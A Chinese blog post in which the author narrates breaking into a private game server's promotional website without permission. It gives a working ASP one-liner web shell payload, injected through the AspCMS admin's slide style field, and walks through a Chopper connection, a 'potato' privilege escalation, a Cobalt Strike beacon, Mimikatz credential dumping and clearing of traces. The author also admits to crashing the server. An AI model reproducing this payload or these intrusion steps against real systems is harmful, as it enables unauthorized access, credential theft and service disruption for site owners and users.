<>记录一次游戏私服getshell过程

晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。

传统的游戏宣传页面,没啥东西

试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~


这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注入,但是前提你得需要知道后台的目录,这里就不透露啦~网上关于这个版本的漏洞分析的文章不少。
得到后台账户密码后,我们登录后台

嗯,没错,熟悉的页面~还是那个味!
本来还犯困的我突然精神了,简单的翻了翻后台的各个功能块,上传点基本都没法利用,写死了

aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5,这方法就不好用了

真巧,我们这个还就是IIS7.5
不要慌,我这里还有用一种拿shell的方法,也是之前看到过某位表哥的文章学习到的
进入后台,“扩展功能”–“幻灯片设置”–”幻灯样式”

使用浏览器的F12的开发者调试工具,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%


按道理讲其实这一步操作完,直接用菜刀连接/config/AspCms_Config.asp这个配置文件,密码为a就可以getshell了,但是由于我手残,也可能是太晚了脑子不清醒,我把内容输错了,服务器配置文件出错了,导致服务器500了

这怎么办,加了一下他们的游戏群,或许管理员应该会修复吧。
第二天一起床,先看了一下群消息,果不其然,群内好多吐槽的,我也跟着吐槽了一下,其实希望管理员快点修复

发完这句话,心中默念了三句(对不起,对不起,对不起)
下午回家后,看了一眼群消息

太棒了,给管理员点个赞,网站修好了,按照同样的步骤,我一个字母一个字母的操作,终于用菜刀连接上了,还好没出错,再搞崩了我就没心态了

执行了一下whoami,权限太低,需要提权

tasklist查看了一下进程,没有杀软。只有一些游戏管理工具跟常用的服务软件

朋友说应该可以直接用土豆提权,上传了一个土豆提权工具,执行了一下whoami,system,可以

服务器开启cs服务,本地登录客户端,开启监听,生成了一个cs马

上传到服务器直接利用土豆运行一下
成功上线,system权限。

时间不早了,利用MImikatz读取服务器登录密码,成功登录服务器,截了个图,把痕迹清理一下,就不乱动他的东西了。睡觉~

最后一句,大佬绕道,勿喷。

技术
©2019-2020 Toolsou All rights reserved,
车主无忧:为什么放弃开源Kafka?必传之作!Alibaba内部出品Redis深度笔记及源码宝典统信UOS首次公布软件适配:QQ、微信、迅雷都有了阿里开发10年技术核心总结,Springboot+Redis文档,送给努力上进的程序员python画爱心Docker容器数据卷详解(共享数据)为何华为的5G专利高居第一名,却还被高通要求缴纳专利费?Spring循环依赖三级缓存是否可以减少为二级缓存?C#中字典的排序方法面试还不会Spring?阿里P8总结的100道面试解析,让你实锤面试官